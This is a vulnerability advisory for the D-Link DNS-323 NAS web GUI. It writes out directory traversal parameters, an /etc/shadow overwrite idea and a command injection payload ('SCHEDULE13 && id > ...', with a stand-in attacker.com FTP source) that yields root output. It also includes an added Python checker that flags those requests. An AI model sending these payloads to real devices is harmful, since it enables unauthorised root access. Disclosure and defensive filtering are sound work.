
D-Link DNS-323 File Upload / Traversal / Command Execution

Posted May 2, 2013
Authored by sghctoma

D-Link DNS-323 suffers from remote arbitrary file upload, directory traversal, and command execution vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, file inclusion, file upload
SHA-256 | 73e321a17a925589691872d4a616ae300aabc4641e22fad215bbb2024c010d77

###############################################################################
# Exploit Title: D-Link DNS-323 Multiple Vulnerabilities
# Author: sghctoma
# E-mail: tamas.szakaly@praudit.hu
# Category: Hardware
# Vendor: http://www.dlink.com/
# Firmware Version: 1.09
# Product: http://www.dlink.com/us/en/support/product/dns-323-1tb-sharecenter-2-bay-network-storage-sata-raid-0-1-usb-print-server
###############################################################################

.intro
======

DNS-323 is a NAS product from D-Link with a web GUI. The GUI is vulnerable to
multiple attacks described below. Both vulns are in the "SCHEDULE DOWNLOAD" page,
and both require authentication. However, a normal user is enough; there is no
need for admin.

.vulnerabilities
================

.arbitrary file upload
----------------------
When one clicks in the "Save To" textbox or the "Browse" button, a popup appears
with the directories on the "Volume_1" share. When one clicks the "+" sign to
open a directory, a POST request is sent to /goform/GetNewDir with the following
parameters:

fNEW_DIR /mnt/Volume_1
f_backup 0
f_IP_address <ip address of NAS>
f_file 0

A directory traversal is possible via the fNEW_DIR variable, and we can browse
not only the directories but also the files by setting f_file to "1". So, for
example, with the following params one can browse /:

fNEW_DIR /mnt/Volume_1/../../
f_backup 0
f_IP_address <ip address of NAS>
f_file 1

So, this way we can browse the entire directory tree, and we can schedule a
download to wherever we want. (e.g. overwrite /etc/shadow - oh, yes, we are
doing everything as root, btw.)

.OS command execution
---------------------

When one clicks the "play button" on a scheduled download, a POST request is
sent to /goform/right_now_d with the following parameter:

T1 <at job id>,SCHEDULE<num>,<user>,<source>,<destination>,<num>

SCHEDULE<num> is injectable, so for example setting T1 to the following writes
the output of the "id" command to a web accessible file:

11,SCHEDULE13 && id > /web/path/id.txt,dns323,ftp://attacker.com/dummy.txt,/Volume_1/Public,1

After such a query we can visit <NAS address>/web/path/id.txt, and we will see
the following content:

uid=0(root) gid=0(root)
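
A request check for both endpoints, as an added example that is not part of the
original advisory or of D-Link's firmware: it confines fNEW_DIR to the share root
and applies a per-field allow-list to T1. The form-urlencoded body encoding, the
T1 field patterns and the sample requests are assumptions built from the values
quoted above.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlencode

SHARE_ROOT = "/mnt/Volume_1"  # share root from the advisory's GetNewDir request
# Assumed allow-list for the six comma-separated T1 fields (grammar not documented).
T1_FIELDS = [re.compile(p) for p in (
    r"\d+", r"SCHEDULE\d+", r"[A-Za-z0-9_.-]+",    # at job id, schedule, user
    r"(?:ftp|https?)://[A-Za-z0-9._~:/?#@%+=-]+",  # source URL, no shell metacharacters
    r"/[A-Za-z0-9_./-]+", r"\d+")]                 # destination, trailing number

def check_new_dir(value):
    """Return a reason string if fNEW_DIR leaves SHARE_ROOT, else None."""
    # Lexical normalisation only; code on the device would also resolve symlinks.
    resolved = posixpath.normpath(value)
    if resolved != SHARE_ROOT and not resolved.startswith(SHARE_ROOT + "/"):
        return f"fNEW_DIR resolves to {resolved!r}, outside {SHARE_ROOT}"
    return None

def check_t1(value):
    """Return a reason string if any T1 field fails its allow-list, else None."""
    fields = value.split(",")
    if len(fields) != len(T1_FIELDS):
        return f"T1 has {len(fields)} fields, expected {len(T1_FIELDS)}"
    for i, (pattern, field) in enumerate(zip(T1_FIELDS, fields)):
        if not pattern.fullmatch(field):
            return f"T1 field {i} fails allow-list: {field!r}"
    if ".." in fields[4].split("/"):
        return "T1 destination contains '..'"
    return None

CHECKS = {"/goform/GetNewDir": ("fNEW_DIR", check_new_dir),
          "/goform/right_now_d": ("T1", check_t1)}

def inspect(path, body):
    """Return the list of findings for one POST (URL path, urlencoded body)."""
    if path not in CHECKS:
        return []
    name, check = CHECKS[path]
    values = parse_qs(body, keep_blank_values=True).get(name, [])
    return [reason for reason in map(check, values) if reason]

TAIL = ",dns323,ftp://attacker.com/dummy.txt,/Volume_1/Public,1"
SAMPLES = [  # constructed requests using the parameter values quoted in the advisory
    ("/goform/GetNewDir", urlencode({"fNEW_DIR": "/mnt/Volume_1", "f_file": "0"})),
    ("/goform/GetNewDir", urlencode({"fNEW_DIR": "/mnt/Volume_1/../../", "f_file": "1"})),
    ("/goform/right_now_d", urlencode({"T1": "11,SCHEDULE13" + TAIL})),
    ("/goform/right_now_d", urlencode({"T1": "11,SCHEDULE13 && id > /web/path/id.txt" + TAIL})),
]
if __name__ == "__main__":
    for path, body in SAMPLES:
        print(path, inspect(path, body) or "ok")
```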

###############################################################################
Screenshots and a write-up of these vulns in Hungarian are available at the
following URL: http://praudit.hu/index.php/blog/nassoljunk

